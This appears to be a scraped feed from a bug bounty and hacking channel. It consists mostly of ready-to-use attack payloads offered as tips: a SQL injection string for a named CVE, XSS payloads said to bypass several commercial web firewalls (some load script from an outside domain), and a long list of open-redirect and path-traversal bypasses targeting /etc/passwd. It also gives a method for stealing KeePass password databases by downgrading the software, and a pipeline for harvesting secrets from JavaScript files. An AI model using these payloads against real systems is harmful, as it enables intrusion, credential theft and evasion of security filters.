2246
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
SQLI Injection
CVE: 2024-36837
Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334
#BugBounty #Tips
Cloudflare #XSS WAF Bypass by @nav1n0x
Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
A solid XSS payload that bypasses Imperva WAF ⚙️
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
Retrieves DNS records without any authentication
curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"
Find sensitive files using Wayback
waybackurls 123.com | grep - -color -E "1.xls | \\.tar.gz | \\.bak | \\.xml | \\.xlsx | \\.json | \\.rar | \\.pdf | \\.sql | \\.doc | \\.docx | \\.pptx | \\.txt | \\.zip | \\.tgz | \\.7z"
🇷🇺 Zero-Day by AI: Google Claims World First As AI Finds 0-Day Security Vulnerability.
https://www.forbes.com/sites/daveywinder/2024/11/04/google-claims-world-first-as-ai-finds-0-day-security-vulnerability/
32 vulnerabilities in IBM Security Verify Access - IT Security Research by Pierre
https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html
Taming Post Claps
https://medium.com/medium-eng/taming-post-claps-273d97ce1ced
Easy logic bug that leaks the email for every user: banertheinrich/easy-logic-bug-that-leaks-the-email-for-every-user-ef2d9d0cf088?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@banertheinrich/easy-logic-bug-that-leaks-the-email-for-every-user-ef2d9d0cf088?source=rss------bug_bounty-5
Читать полностью…
https://x.com/0x0SojalSec/status/1850608716095295555?t=blxmzovwhe3Wy4CPvezKvw&s=35
Читать полностью…
💉 Awesome Sqlmap Tampers.
• SQLMap Tamper List;
• space2comment.py;
• randomcase.py;
• between.py;
• charencode.py;
• equaltolike.py;
• appendnullbyte.py;
• base64encode.py;
• chardoubleencode.py;
• commalesslimit.py;
• halfversionedmorekeywords.py;
• modsecurityversioned.py;
• space2hash.py;
• overlongutf8.py;
• randomcomments.py;
• unionalltounion.py;
• versionedkeywords.py;
• space2dash.py;
• multiplespaces.py;
• nonrecursivereplacement.py;
• space2comment.py;
• equaltolike.py;
• space2tab.py;
• between.py;
• charencode.py;
• space2dash.py;
• lowercase.py;
• How to write Tamper Script for SQLMap.
#Sqlmap
Guys 2000 followers❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️
Читать полностью…
amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5" rel="nofollow">https://medium.com/@amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5
Читать полностью…
you can try this effective manual openredirect Bypass:
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:⚙️
/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529Читать полностью…
an XSS payload to bypass some waf & filters in Firefox
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
Pre-Auth RCE CyberPanel 0day by Chirag Artani 🔥
Useful video from our friend's channel about one of the freshest big vulnerabilities with Netlas search 🔎
We also recommend checking out his website and Twitter for more tips:
👉 Site: 3rag.com
👉 Twitter: x.com/Chirag99Artani
a XSS payload with Alert Obfuscation, for bypass Regex filter
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
Improve your #XSS reports! 🔥
Use our https://X55.is ✨ domain
✅ Replacing alert(1)
'-import('//X55.is')-'
<Svg OnLoad=import('//X55.is')>
✅ As href/src attribute
<Base Href=//X55.is>
<Script Src=//X55.is>
📌 Automated JavaScript Secret Detection
1 - Collect alive domains
docker run -v $(pwd):/src projectdiscovery/subfinder:latest -dL /src/domains -silent -o /src/subdomains
docker run -v $(pwd):/src projectdiscovery/dnsx:latest -l /src/subdomains -t 500 -retry 5 -silent -o /src/dnsx
docker run -v $(pwd):/src projectdiscovery/naabu:latest -l /src/dnsx -tp 1000 -ec -c 100 -rate 5000 -o /src/alive_ports
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/alive_ports -t 100 -rl 500 -o /src/alive_http_services
docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
docker run -v $(pwd):/src projectdiscovery/nuclei:latest -l /src/js_links -tags token,tokens -es unknown -rl 500 -c 100 -silent -o /src/secret-results
docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/js_links -t 100 -rl 500 -sr -srd /src/js_response
docker run --rm -it -v "$PWD:/src" trufflesecurity/trufflehog:latest filesystem /src/js_response/response --only-verified --concurrency=50
Template Engines Injection 101
0xAwali/template-engines-injection-101-4f2fe59e5756" rel="nofollow">https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
7 Tips for bug bounty beginners
https://blog.intigriti.com/hacking-tools/7-tips-for-bug-bounty-beginners
😈 [ Diego Capriotti @naksyn ]
This has been one of my favorites for a while, but now it's time to let it go.
Here's my preferred way of getting the KeePass db that we often hunt for:
downgrade the executable to version 2.53, use CVE-2023-24055 and wait for the busy admin to trigger the dump of the database.
The target can remain clean and you can simply check for the dump creation.
KeePass version 2.53 can still open kdbx created with the version 2.57 and if using a proper xml the user will likely notice nothing.
Update alerts can also be disabled within the xml.
🔗 https://gist.github.com/naksyn/6d5660dacd0730498a274b85d62a77e8
🐥 [ tweet ]
My new post sharing an investigation on a $243M theft from last month which lead to multiple arrests and $9M+ frozen
https://x.com/zachxbt/status/1836752923830702392?
Subdomain Enumaration Using Web Archive
This is a Bash function for extracting subdomains from Web Archive results. You can add this function to your ~/.bashrc file.
function wayback() {
curl -sk "http://web.archive.org/cdx/search/cdx?url=*.$1&output=txt&fl=original&collapse=urlkey&page=" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u
}
Читать полностью…
https://eslam3kl.medium.com/simple-recon-methodology-920f5c5936d4
Читать полностью…
Stored XSS Critical or NOT?: mrro0o0tt/stored-xss-critical-or-not-da9eb9b19029?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@mrro0o0tt/stored-xss-critical-or-not-da9eb9b19029?source=rss------bug_bounty-5
Читать полностью…